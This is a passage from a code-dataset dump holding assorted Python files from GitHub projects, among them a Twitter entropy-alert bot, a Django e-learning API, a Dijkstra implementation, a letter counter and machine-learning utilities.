bd_low)] = np.percentile(sub_img, bd_low)\n new_image.append(sub_img)\n new_image = np.stack(new_image, axis=0)\n return new_image\n\n\n\n","repo_name":"tommy-qichang/DSL_All_Code","sub_path":"segmentation/data_loader/my_transforms/exp_dt_to_seg.py","file_name":"exp_dt_to_seg.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"62"} +{"seq_id":"9634642822","text":"import requests\nimport json\nimport time\nimport redis\nimport tweepy\nimport os\nimport numpy as np\n\nfrom tweepy.error import TweepError\n\nconn = redis.Redis()\n# alert if entropy is less than this many standard deviations below the mean\nzscore_threshold = -1.5\n# API base url\nurl = \"http://{}:5000\".format(os.environ[\"API_BASE_URL\"])\n\ndef zscore(entropy):\n '''\n Given an entropy value, returns its distance from the mean entropy as\n the number of standard deviations.\n '''\n keys = conn.keys(\"entropy:*\")\n entropy_vals = np.array([float(val) for val in conn.mget(keys)])\n mean_entropy = np.mean(entropy_vals)\n std_dev = np.std(entropy_vals)\n return (entropy - mean_entropy)/std_dev\n\ndef below_entropy_threshold(entropy):\n '''\n Given an entropy value, returns whether it is less than the threshold\n number of standard deviations away from the mean entropy.\n '''\n return zscore(entropy) < zscore_threshold \n\ndef get_most_retweeted():\n '''\n Returns the original @nytimes status, published within \n 2 to 6 hours ago, that has been retweeted the most up to this point.\n '''\n r = requests.get(\"{}/distribution\".format(url))\n dist = 
json.loads(r.text)\n    max_mass = -1\n    most_retweeted = None\n    for status_text, num_retweets in dist.items():\n        if num_retweets > max_mass:\n            max_mass = num_retweets\n            most_retweeted = status_text\n    return most_retweeted\n\nif __name__ == \"__main__\":\n    CONSUMER_KEY = os.environ[\"BOT_CONSUMER_KEY\"]\n    CONSUMER_SECRET = os.environ[\"BOT_CONSUMER_SECRET\"]\n    ACCESS_TOKEN = os.environ[\"BOT_ACCESS_TOKEN\"]\n    ACCESS_TOKEN_SECRET = os.environ[\"BOT_ACCESS_TOKEN_SECRET\"]\n    auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\n    auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)\n    twitter_api_wrapper = tweepy.API(auth)\n    \n    while True:\n        # make call to entropy API endpoint\n        r = requests.get(\"{}/entropy\".format(url))\n        entropy = json.loads(r.text)[\"entropy\"]\n        # save entropy observation in redis\n        conn.set(\"entropy:{}\".format(time.time()), entropy)\n        if below_entropy_threshold(entropy):\n            most_retweeted_text = get_most_retweeted()\n            tweet_text = \"Entropy < {thres} stddev. Most likely RT: {text}\".format(thres=zscore_threshold, text=most_retweeted_text)\n            while True:\n                try:\n                    twitter_api_wrapper.update_status(tweet_text)\n                    break\n                except TweepError as e:\n                    err_code = e.args[0][0]['code']\n                    # duplicate msg\n                    if err_code == 187:\n                        modified_tweet_text = \"t={curtime}: Entropy < {thres} stddev. Most likely RT same as previous.\".format(curtime=time.time(), thres=zscore_threshold)\n                    # status exceeds 140\n                    elif err_code == 186:\n                        nyt_url = None\n                        for token in most_retweeted_text.split(\" \"):\n                            if token.find(\"http://\") > -1 or token.find(\"https://\") > -1:\n                                nyt_url = token\n                        if nyt_url:\n                            modified_tweet_text = \"Entropy < {thres} stddev. Most likely RT: {nyt_url}\".format(thres=zscore_threshold, nyt_url=nyt_url)\n                        else:\n                            modified_tweet_text = tweet_text[:120]\n                    # unrecognized error code: re-raise instead of retrying blindly\n                    else:\n                        raise\n                    tweet_text = modified_tweet_text\n        time.sleep(30 * 60)\n","repo_name":"six5532one/retweets_of_nyt_distributions","sub_path":"alert_entropy_change.py","file_name":"alert_entropy_change.py","file_ext":"py","file_size_in_byte":3517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"}
{"seq_id":"21535886151","text":"import csv\nimport matplotlib.pyplot as plt\n\nfilename=\"sitka_weather_07-2014.csv\"\nwith open(filename) as file:\n    content = csv.reader(file)\n    # skip the header row\n    header_row = next(content)\n\n    highs = []\n    for row in content:\n        # convert to int\n        highs.append(int(row[1]))\n\nplt.plot(highs, color='red')\nplt.show()","repo_name":"Whatsupyuan/python_ws","sub_path":"16-AnalysisData/05_csv_graph.py","file_name":"05_csv_graph.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"}
{"seq_id":"5169705568","text":"import tensorflow as tf\n\n\nin_path = \"../model/pb/mobileFaceNet_pts.pb\"\nout_path = \"../model/pb/mobileFaceNet_pts.tflite\"\n\ninput_tensor_name = [\"input\"]\ninput_tensor_shape = {\"input\": [1, 112, 112, 3]}\nclasses_tensor_name = [\"embeddings\"]\n\nconverter = tf.lite.TFLiteConverter.from_frozen_graph(in_path, input_tensor_name,\n                                                      classes_tensor_name, input_shapes=input_tensor_shape)\n\nwith open(out_path, \"wb\") as f:\n    f.write(converter.convert())\n\n","repo_name":"FancyXun/federated_app","sub_path":"src/main/python/face_rec/utils/lite_converter.py","file_name":"lite_converter.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"}
{"seq_id":"11547294688","text":"from domain.values.slide_images import SlideImages\nfrom domain.values.timelines import Timeline, Timelines\nfrom domain.values.video import Video\n\n\ndef classify_all_frame(video: Video, slide_images: SlideImages, distance, on_progress) -> Timelines:\n    timelines = Timelines()\n    with video:\n        for time, frame in video.timed_frames:\n            slide_number = __classify_a_frame(frame, slide_images, distance)\n            timelines.append(Timeline(time, slide_number))\n            progress = time / video.time_length\n            on_progress(progress)\n    return timelines\n\n\ndef __classify_a_frame(frame, slide_images: SlideImages, distance) -> int:\n    distances = list(map(lambda slide_image: distance(frame, slide_image),\n                         slide_images))\n    return __argmin(distances)\n\n\ndef __argmin(l: list):\n    return min(range(len(l)), key=lambda i: l[i])\n","repo_name":"SmoothieTeam/Sli-Sync","sub_path":"algorithm/domain/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"}
{"seq_id":"14289098780","text":"from .models import Comment\r\n\r\n\r\nfrom django.forms import ModelForm\r\n\r\nclass CommentForm(ModelForm):\r\n    class Meta:\r\n        model = Comment\r\n        fields = [\"body\"]\r\n        labels = {\r\n            \"body\": \"\"\r\n        }\r\n\r\n    def __init__(self, *args, **kwargs):\r\n        super(CommentForm, self).__init__(*args, **kwargs)\r\n\r\n        self.fields[\"body\"].widget.attrs.update({\"class\":\"comment-text-field\"})\r\n        self.fields[\"body\"].widget.attrs.update({\"placeholder\":\"Add a comment...\"})\r\n","repo_name":"AdrianHorvath8/ITube","sub_path":"videos/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"}
{"seq_id":"24101376808","text":"from rest_framework import generics, exceptions\nfrom rest_framework.views import APIView\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\n\nfrom university.serializers import (\n    EmployeeSerializer,\n    StudentSerializer,\n    SubjectSerializer,\n    TeacherSerializer,\n    CourseSerializer,\n    LessonSerializer\n    )\nfrom university.permissions import SchoolAdministrators, Teachers, Students\nfrom university import models\n\n\nclass ExibitionView(APIView):\n    permission_classes = (AllowAny,)\n    def get(self, request):\n        info = {\n            \"project_name\": \"ead-courses-api\",\n            \"author\": \"Gabriel Mendes\",\n            \"description\": \"API for a fictional EAD platform. You can learn more in the README on GitHub. You will find all the routes over there\",\n            \"repo\": \"https://github.com/gbr-mendes/ead-courses-api\",\n            \"users\": {\n                \"employee\": {\n                    \"email\": \"nelsondanilosamuelpeixoto_@dlh.de\",\n                    \"password\": \"password\"\n                },\n                \"teacher\":{\n                    \"email\": \"valentinanairelzasilveira-98@babo.adv.br\",\n                    \"password\": \"password\"\n                },\n                \"student\":{\n                    \"email\": \"eelianebrendaalves@ssala.com.br\",\n                    \"password\": \"password\"\n                }\n\n            },\n            \"ATTENTION\": \"The system uses token authentication. You can generate the token at https://ead-courses-api.herokuapp.com/api/accounts/token/ . 
I suggest you use an extension for your browser like modheader to pass the token on your requests\"\n        }\n        return Response(info)\n\n\n\nclass CreateListEmployeeAPIView(generics.ListCreateAPIView):\n    \"\"\"Create a new employee in the system\"\"\"\n    serializer_class = EmployeeSerializer\n    permission_classes = (SchoolAdministrators,)\n    queryset = models.Employee.objects.all()\n\n\nclass RetriveEmployeeAPIView(\n    generics.DestroyAPIView,\n    generics.RetrieveUpdateAPIView\n    ):\n    \"\"\"Retrieve a specific employee\"\"\"\n    serializer_class = EmployeeSerializer\n    permission_classes = (SchoolAdministrators,)\n    queryset = models.Employee.objects.all()\n\n\nclass CreateTeacherAPIView(generics.ListCreateAPIView):\n    \"\"\"Create a new Teacher in the system\"\"\"\n    serializer_class = TeacherSerializer\n    permission_classes = (SchoolAdministrators,)\n    queryset = models.Teacher.objects.all()\n\n\nclass RetriveTeacherAPIView(\n    generics.RetrieveUpdateAPIView,\n    generics.DestroyAPIView\n    ):\n    \"\"\"Retrieve a specific teacher\"\"\"\n    serializer_class = TeacherSerializer\n    permission_classes = (SchoolAdministrators,)\n    queryset = models.Teacher.objects.all()\n\n\nclass CreateStudentAPIView(generics.ListCreateAPIView):\n    \"\"\"Create a new student in the system\"\"\"\n    serializer_class = StudentSerializer\n    permission_classes = (SchoolAdministrators,)\n    queryset = models.Student.objects.all()\n\n\nclass RetriveStudentAPIView(\n    generics.RetrieveUpdateAPIView,\n    generics.DestroyAPIView\n    ):\n    serializer_class = StudentSerializer\n    permission_classes = (SchoolAdministrators,)\n    queryset = models.Student.objects.all()\n\n\nclass CreateCourseAPIView(generics.ListCreateAPIView):\n    \"\"\"Create a new Course in the system\"\"\"\n    serializer_class = CourseSerializer\n    permission_classes = (SchoolAdministrators,)\n    queryset = models.Course.objects.all()\n\n\nclass RetriveCourseAPIView(\n    generics.RetrieveUpdateAPIView,\n    generics.DestroyAPIView\n    ):\n    \"\"\"Retrieve a specific course\"\"\"\n    serializer_class = CourseSerializer\n    permission_classes = (SchoolAdministrators,)\n    queryset = models.Course.objects.all()\n\n\nclass CreateLessonAPIView(generics.CreateAPIView, generics.ListAPIView):\n    \"\"\"Create a new lesson on the system\"\"\"\n    serializer_class = LessonSerializer\n    permission_classes = (Teachers,)\n    queryset = models.Lesson.objects.all()\n\n\nclass WatchCourseAPIView(generics.RetrieveAPIView):\n    \"\"\"Retrieve a course for a student\"\"\"\n    serializer_class = CourseSerializer\n    permission_classes = (Students,)\n    queryset = models.Course.objects.all()\n\n    def get_object(self):\n        try:\n            queryset = super().get_object()\n            user = self.request.user\n            student = models.Student.objects.get(user=user)\n            if student.course != queryset:\n                raise exceptions.PermissionDenied(\n                    'The student can only access the course in which he is enrolled',\n                )\n\n            return queryset\n        except exceptions.PermissionDenied as e:\n            raise e\n        except models.Student.DoesNotExist:\n            raise exceptions.PermissionDenied('Only students can watch a course')\n\n\nclass CreateSubjectAPIView(generics.ListCreateAPIView):\n    serializer_class = SubjectSerializer\n    permission_classes = (SchoolAdministrators,)\n    queryset = models.Subject.objects.all()\n\n\nclass WatchLessonAPIVIew(generics.RetrieveAPIView):\n    serializer_class = LessonSerializer\n    permission_classes = (Students,)\n    queryset = models.Lesson.objects.all()\n\n    def get_object(self):\n        queryset = super().get_object()\n        try:\n            student = models.Student.objects.get(\n                user=self.request.user\n            )\n            course = student.course\n            # the requested lesson must belong to one of the subjects of the\n            # course the student is enrolled in\n            exists = queryset.subject in course.subjects.all()\n\n            if not exists:\n                raise exceptions.PermissionDenied(\n                    'The student can only access the lessons of the course in which he is enrolled'\n                )\n            return queryset\n        except exceptions.PermissionDenied as e:\n            raise e\n        except models.Student.DoesNotExist:\n            raise exceptions.PermissionDenied(\n                'Only a student can watch a lesson'\n            )","repo_name":"gbr-mendes/ead-courses-api","sub_path":"app/university/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6470,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"}
{"seq_id":"9213544744","text":"import heapq\nimport sys\ninput = sys.stdin.readline\nINF = int(1e9)\n# Using a priority-queue heap reduces the time complexity from O(V^2) to O(ElogV).\n\nn, m = map(int, input().split())\n\nstart = int(input())\n\ngraph = [[] for i in range(n+1)]\n\ndistance = [INF] * (n+1)\n\nfor _ in range(m):\n    a, b, c = map(int, input().split())\n    graph[a].append((b, c))\n    \ndef dijkstra(start):\n    q = [] # list used as the priority queue\n    heapq.heappush(q, (0, start)) # (distance, node)\n    distance[start] = 0\n    while q:\n        dist, now = heapq.heappop(q)\n        \n        if distance[now] < dist: # skip nodes that have already been processed\n            continue\n        for i in graph[now]:\n            cost = dist + i[1]\n            if cost < distance[i[0]]:\n                distance[i[0]] = cost\n                heapq.heappush(q, (cost, i[0])) # push the updated distance together with its node\n    \ndijkstra(start)\n\nfor i in range(1, n+1):\n    if distance[i] == INF:\n        print(\"Infinity\")\n    else:\n        print(distance[i])","repo_name":"TaeKyuIm/coding_test","sub_path":"better_dijkstra.py","file_name":"better_dijkstra.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"}
{"seq_id":"30871732732","text":"import argparse\nimport requests\nimport multiprocessing\nfrom pathlib import Path\nimport os\nimport re\nfrom collections import Counter\nfrom time import time\nfrom urllib.parse import urljoin\n\n\ndef arguments():\n    parser = argparse.ArgumentParser()\n\n    parser.add_argument(\"--url\", help=\"url with articles.\", type=str)\n    parser.add_argument(\n        \"--num_processes\",\n        help=\"number of processes to use.\",\n        type=int,\n        default=multiprocessing.cpu_count(),\n    )\n\n    return parser.parse_args()\n\n\ndef download_text(url):\n    if Path(\"downloads/\" + url[0]).exists():\n        return\n    try:\n        text = requests.get(url[1])\n        with open(\"downloads/\" + url[0], \"w+\") as f:\n            f.write(text.text)\n    except requests.exceptions.RequestException as e:\n        print(f\"Cannot download {url[0]}\")\n\n\ndef get_articles(path):\n    if Path(path).exists():\n        return [x.split()[0] for x in open(path, \"r\").readlines()]\n    raise FileNotFoundError(\"files.txt is not present.\")\n\n\ndef process_file(file):\n    wanted = re.compile(\n        \"([^-_a-zA-Z0-9!@#%&=,/'\\\";:~`\\$\\^\\*\\(\\)\\+\\[\\]\\.\\{\\}\\|\\?\\<\\>\\\\]+|[^\\s]+)\"\n    )\n    with open(\"downloads/\" + file) as file:\n        content = Counter(list(wanted.sub(\" \", file.read())))\n    return content\n\n\ndef write_result(result_file, letters):\n    with open(result_file, \"w+\") as out:\n        for key, val in letters.items():\n            out.write(\"%s %s\\n\" % (key, val))\n\n\ndef merge_counts(counts):\n    super_counter = Counter()\n    for c in counts:\n        super_counter.update(c)\n\n    return super_counter\n\n\ndef download_process(url_files):\n    download_text(url_files)\n    return process_file(url_files[0])\n\n\ndef run():\n    start = time()\n    args = arguments()\n    num_processes = args.num_processes\n    url = args.url\n\n    if not Path(\"downloads\").exists():\n        os.makedirs(\"downloads\")\n\n    file_url = [(file, urljoin(url, file)) for file in get_articles(\"files.txt\")]\n\n    with multiprocessing.Pool(num_processes) as pool:\n        res = pool.map(download_process, file_url)\n\n    write_result(\"result.txt\", merge_counts(res))\n    print(f\"Done in {int(time()-start)} seconds.\")\n\n\nif __name__ == \"__main__\":\n    run()\n","repo_name":"smaystr/rails_reactor","sub_path":"letter_counter/04/letter_counter.py","file_name":"letter_counter.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"}
{"seq_id":"72736288836","text":"# def mult(a, b):\n#     if b == 1:\n#         return a\n#     else:\n#         return a + mult(a, b-1)\n\n# print(mult(5,4))\n\n# a = 5\n# b = 4\n# while b > 1:\n#     a = a + 5\n#     b -= 1\n# print(a)\n\n# def fact(r):\n#     res = 1\n#     for i in range(1,r+1):\n#         res *=i\n#     return res\n\n# print(fact(5))\n\n# def fact(x, y=1):\n#     if x == 1:\n#         return y\n#     else:\n#         return fact(x-1, y*x)\n\n# print(fact(5))\n\ndef fact(x):\n    if x == 1:\n        return 1\n    else:\n        return x*fact(x-1)\nprint(fact(5))","repo_name":"SpoiledPotato/CU-Python","sub_path":"lecture-3/recursion.py","file_name":"recursion.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"}
{"seq_id":"35195001301","text":"import tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom statsmodels.tools.eval_measures import rmse\nfrom sklearn.metrics import r2_score\nimport pandas as pd\n\ndef mape(actual, pred): \n    actual, pred = np.array(actual), np.array(pred)\n    return np.mean(np.abs((actual - pred) / actual)) * 100\n\ndef build_and_compile_model(input_dim=11):\n    \"\"\"\n    Function to build and compile DNN architecture\n    \"\"\"\n    model = keras.Sequential([\n        layers.Dense(64, input_dim=input_dim, activation='relu'),\n        layers.Dense(64, activation='relu'),\n        layers.Dense(1)\n    ])\n\n    model.compile(loss='mean_squared_error',\n                optimizer=tf.keras.optimizers.Adam(0.001))\n    return model\n\ndef fit_model(model, epochs, batch_size, train_features, train_labels):\n    \"\"\"\n    Function to fit the DNN model with specified epochs and batch_size\n    \"\"\"\n    print(model.summary())\n    history = model.fit(train_features,\n                    train_labels, validation_split=0.2,\n                    verbose=0, epochs=epochs, batch_size=batch_size)\n    return history\n\ndef plot_loss(history):\n    \"\"\"\n    Function to plot history's loss\n    \"\"\"\n    plt.plot(history.history['loss'], label='loss')\n    plt.plot(history.history['val_loss'], label='val_loss')\n    plt.xlabel('Epoch')\n    plt.ylabel('Error [Close]')\n    plt.legend()\n    plt.grid(True)\n    plt.show()\n\ndef genPredictions(model,ori_df,test_features,train_len):\n    \"\"\"\n    Function to generate predictions with the developed model\n    Returns predictions dataframe with Pred and Actual columns\n    \"\"\"\n    predictions = model.predict(test_features).flatten()\n    actual_close = ori_df[['Close']]\n    \n    act = pd.DataFrame(actual_close.iloc[train_len:, 0])\n    \n    predictions = pd.DataFrame(predictions)\n    predictions.reset_index(drop=True, inplace=True)\n    predictions.index = test_features.index\n    predictions['Actual'] = act['Close']\n    predictions.rename(columns={0:'Pred'}, inplace=True)\n    return predictions\n\ndef plotPredAct(predictions_df):\n    \"\"\"\n    Function to plot predictions versus actual values\n    \"\"\"\n    predictions_df['Actual'].plot(figsize=(20,8), legend=True, 
color='blue')\n    predictions_df['Pred'].plot(legend=True, color='red', figsize=(20,8))\n\ndef inversePredsAndAct(predictions_df, close_scaler, test_labels):\n    \"\"\"\n    Function to inverse transform the predicted and actual values\n    \"\"\"\n    inversed_pred = close_scaler.inverse_transform(np.array(predictions_df['Pred']).reshape(-1,1))\n    inversed_act = close_scaler.inverse_transform(np.array(predictions_df['Actual']).reshape(-1,1))\n    \n    inversed = pd.DataFrame(inversed_pred)\n    inversed['Actual'] = inversed_act\n    inversed.rename({0:'Pred'}, axis=1, inplace=True)\n    inversed.index = test_labels.index\n    \n    return inversed\n\ndef plotErrorHist(inversed_df):\n    \"\"\"\n    Function to plot error histogram\n    \"\"\"\n    error = inversed_df['Pred'] - inversed_df['Actual']\n    plt.hist(error, bins=25)\n    plt.xlabel('Prediction Error [Close]')\n    _ = plt.ylabel('Count')\n\ndef evaluateModel(inversed_df):\n    rmse_ = rmse(inversed_df['Pred'], inversed_df['Actual'])\n    mape_ = mape(inversed_df['Actual'], inversed_df['Pred'])\n    rsquared_ = r2_score(inversed_df['Actual'], inversed_df['Pred'])\n    return rmse_, mape_, rsquared_","repo_name":"MLDSAI-TUBES/stock-pred-api-rsi-mfi","sub_path":"experiments/FFNN/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"}
{"seq_id":"7976037238","text":"from comments.forms import CommentForm\r\nfrom comments.models import Comment\r\nfrom django.conf import settings\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.core import serializers\r\nfrom django.core.urlresolvers import reverse\r\nfrom django.http import HttpResponse, HttpResponseRedirect\r\nfrom django.shortcuts import get_object_or_404, render_to_response\r\nfrom django.template import loader, RequestContext, Template\r\nfrom follows.utils import follow_user\r\nfrom notifications.utils import notify\r\nfrom readings.models import Note\r\nfrom replies.forms import ReplyForm\r\nfrom skimreads.utils import add_csrf\r\nfrom users.utils import add_rep, del_rep\r\n\r\nimport json\r\n\r\n@login_required\r\ndef new(request, pk):\r\n    note = get_object_or_404(Note, pk=pk)\r\n    if request.method == 'POST':\r\n        form = CommentForm(request.POST)\r\n        if form.is_valid():\r\n            comment = form.save(commit=False)\r\n            comment.note = note\r\n            comment.user = request.user\r\n            comment.save()\r\n            # add rep\r\n            add_rep(request, c=comment)\r\n            # create notification\r\n            notify(comment=comment)\r\n            d = {\r\n                'comment': comment,\r\n                'comment_form': CommentForm(),\r\n                'note': note,\r\n                'reply_form': ReplyForm(),\r\n                'static': settings.STATIC_URL,\r\n            }\r\n            comment_form = loader.get_template('comments/comment_form.html')\r\n            comment_temp = loader.get_template('comments/comment.html')\r\n            context = RequestContext(request, add_csrf(request, d))\r\n            data = {\r\n                'comment': comment_temp.render(context),\r\n                'comment_count': note.comment_count(),\r\n                'comment_form': comment_form.render(context),\r\n                'comment_pk': comment.pk,\r\n                'note_pk': note.pk,\r\n            }\r\n            return HttpResponse(json.dumps(data), mimetype='application/json')\r\n    return HttpResponseRedirect(reverse('readings.views.detail', \r\n        args=[note.reading.slug]))\r\n\r\n@login_required\r\ndef delete(request, pk):\r\n    \"\"\"Delete a comment.\"\"\"\r\n    comment = get_object_or_404(Comment, pk=pk)\r\n    note = comment.note\r\n    if request.method == 'POST':\r\n        if request.POST.get('delete') == str(comment.pk):\r\n            if comment.user == request.user or request.user.is_staff:\r\n                data = { \r\n                    'note_pk': note.pk,\r\n                    'pk': comment.pk \r\n                    }\r\n                # del rep\r\n                del_rep(request, c=comment)\r\n                comment.delete()\r\n                data['comment_count'] = note.comment_count()\r\n                return HttpResponse(json.dumps(data), \r\n                    mimetype='application/json')\r\n    return HttpResponseRedirect(reverse('readings.views.detail', \r\n        args=[note.reading.slug]))","repo_name":"tommydangerous/skimreads","sub_path":"skimreads/comments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"}
{"seq_id":"31183410167","text":"import os\r\n\r\nfrom django.test import TestCase\r\nfrom django.urls import reverse\r\nfrom django.core.exceptions import ValidationError\r\nfrom rest_framework.test import APITestCase, APIClient\r\nfrom rest_framework import status\r\n\r\nfrom categories.models import Category\r\nfrom users.constants import FIREBASE_UID_LENGTH\r\nfrom utils import create_random_string\r\nfrom users.models import User\r\n\r\nfrom random import randint\r\n\r\n# Create your tests here.\r\nclass TestCategoriesModel(TestCase):\r\n\r\n    def setUp(self):\r\n        self.a_user = User.objects.create(firebase_uid=create_random_string(FIREBASE_UID_LENGTH))\r\n\r\n    def test_category_is_created_for_user(self):\r\n        Category.objects.create(user=self.a_user, name='Education', material_ui_icon_name='School')\r\n        self.assertEqual(len(Category.categories_from_user(self.a_user)), 6)\r\n\r\n    def test_category_from_user_is_deleted(self):\r\n        category_created = Category.objects.create(user=self.a_user, name='Car Maintainment', material_ui_icon_name='CarRepair')\r\n        category_created.delete()\r\n        self.assertEqual(len(Category.categories_from_user(self.a_user)), 5)\r\n\r\n    def test_created_category_is_not_static(self):\r\n        category_created = Category.objects.create(user=self.a_user, name='Storage', material_ui_icon_name='SdCard')\r\n        self.assertFalse(category_created.static)\r\n\r\n    def test_a_default_categories_is_static(self):\r\n        category_created = Category.objects.all()[randint(0, Category.objects.all().count()-1)]\r\n        self.assertTrue(category_created.static)\r\n\r\n    def test_two_categories_with_same_name_should_not_be_created_for_a_user(self):\r\n        Category.objects.create(user=self.a_user, name='A Category', material_ui_icon_name='ShuffleRounded')\r\n\r\n        with self.assertRaisesMessage(ValidationError, \"User cannot create another repeated category\"):\r\n            Category.objects.create(user=self.a_user, name='A Category', material_ui_icon_name='Car')\r\n\r\n    def test_category_dictionary_serialization(self):\r\n        category_created = Category.objects.create(user=self.a_user, name='Storage', material_ui_icon_name='SdCard')\r\n        self.assertEqual(category_created.as_dict['id'], category_created.id)\r\n        self.assertEqual(category_created.as_dict['name'], 'Storage')\r\n        self.assertEqual(category_created.as_dict['material_ui_icon_name'], 'SdCard')\r\n        self.assertEqual(category_created.as_dict['color'], category_created.color)\r\n        self.assertFalse(category_created.as_dict['static'])\r\n","repo_name":"lucasSaavedra123/los-changos-back-end","sub_path":"categories/tests_models.py","file_name":"tests_models.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"22449184610","text":"from typing import Tuple, Sequence, Iterator, List\nfrom scipy.stats import norm\nimport numpy as np\nfrom rl.function_approx import LinearFunctionApprox, 
DNNApprox, \\\n AdamGradient, DNNSpec\nfrom itertools import islice\nfrom rl.gen_utils.plot_funcs import plot_list_of_curves\n\nTriple = Tuple[float, float, float]\nAug_Triple = Tuple[float, float, float, float]\nDataSeq = Sequence[Tuple[Triple, float]]\n\n\ndef example_model_data_generator() -> Iterator[Tuple[Triple, float]]:\n\n coeffs: Aug_Triple = (2., 10., 4., -6.)\n d = norm(loc=0., scale=0.3)\n\n while True:\n pt: np.ndarray = np.random.randn(3)\n x_val: Triple = (pt[0], pt[1], pt[2])\n y_val: float = coeffs[0] + np.dot(coeffs[1:], pt) + \\\n d.rvs(size=1)[0]\n yield (x_val, y_val)\n\n\ndef data_seq_generator(\n data_generator: Iterator[Tuple[Triple, float]],\n num_pts: int\n) -> Iterator[DataSeq]:\n while True:\n pts: DataSeq = list(islice(data_generator, num_pts))\n yield pts\n\n\ndef feature_functions():\n return [lambda _: 1., lambda x: x[0], lambda x: x[1], lambda x: x[2]]\n\n\ndef adam_gradient():\n return AdamGradient(\n learning_rate=0.1,\n decay1=0.9,\n decay2=0.999\n )\n\n\ndef get_linear_model() -> LinearFunctionApprox[Triple]:\n ffs = feature_functions()\n ag = adam_gradient()\n return LinearFunctionApprox.create(\n feature_functions=ffs,\n adam_gradient=ag,\n regularization_coeff=0.,\n direct_solve=True\n )\n\n\ndef get_dnn_model() -> DNNApprox[Triple]:\n ffs = feature_functions()\n ag = adam_gradient()\n\n def relu(arg: np.ndarray) -> np.ndarray:\n return np.vectorize(lambda x: x if x > 0. else 0.)(arg)\n\n def relu_deriv(res: np.ndarray) -> np.ndarray:\n return np.vectorize(lambda x: 1. if x > 0. else 0.)(res)\n\n def identity(arg: np.ndarray) -> np.ndarray:\n return arg\n\n def identity_deriv(res: np.ndarray) -> np.ndarray:\n return np.ones_like(res)\n\n ds = DNNSpec(\n neurons=[2],\n bias=True,\n hidden_activation=relu,\n hidden_activation_deriv=relu_deriv,\n output_activation=identity,\n output_activation_deriv=identity_deriv\n )\n\n return DNNApprox.create(\n feature_functions=ffs,\n dnn_spec=ds,\n adam_gradient=ag,\n regularization_coeff=0.05\n )\n\n\nif __name__ == '__main__':\n training_num_pts: int = 1000\n test_num_pts: int = 10000\n training_iterations: int = 200\n data_gen: Iterator[Tuple[Triple, float]] = example_model_data_generator()\n training_data_gen: Iterator[DataSeq] = data_seq_generator(\n data_gen,\n training_num_pts\n )\n test_data: DataSeq = list(islice(data_gen, test_num_pts))\n\n direct_solve_lfa: LinearFunctionApprox[Triple] = \\\n get_linear_model().solve(next(training_data_gen))\n direct_solve_rmse: float = direct_solve_lfa.rmse(test_data)\n print(f\"Linear Model Direct Solve RMSE = {direct_solve_rmse:.3f}\")\n print(\"-----------------------------\")\n\n print(\"Linear Model SGD\")\n print(\"----------------\")\n linear_model_rmse_seq: List[float] = []\n for lfa in islice(\n get_linear_model().iterate_updates(training_data_gen),\n training_iterations\n ):\n this_rmse: float = lfa.rmse(test_data)\n linear_model_rmse_seq.append(this_rmse)\n iter: int = len(linear_model_rmse_seq)\n print(f\"Iteration {iter:d}: RMSE = {this_rmse:.3f}\")\n\n print(\"DNN Model SGD\")\n print(\"-------------\")\n dnn_model_rmse_seq: List[float] = []\n for dfa in islice(\n get_dnn_model().iterate_updates(training_data_gen),\n training_iterations\n ):\n this_rmse: float = dfa.rmse(test_data)\n dnn_model_rmse_seq.append(this_rmse)\n iter: int = len(dnn_model_rmse_seq)\n print(f\"Iteration {iter:d}: RMSE = {this_rmse:.3f}\")\n\n x_vals = range(training_iterations)\n plot_list_of_curves(\n list_of_x_vals=[x_vals, x_vals],\n list_of_y_vals=[linear_model_rmse_seq, 
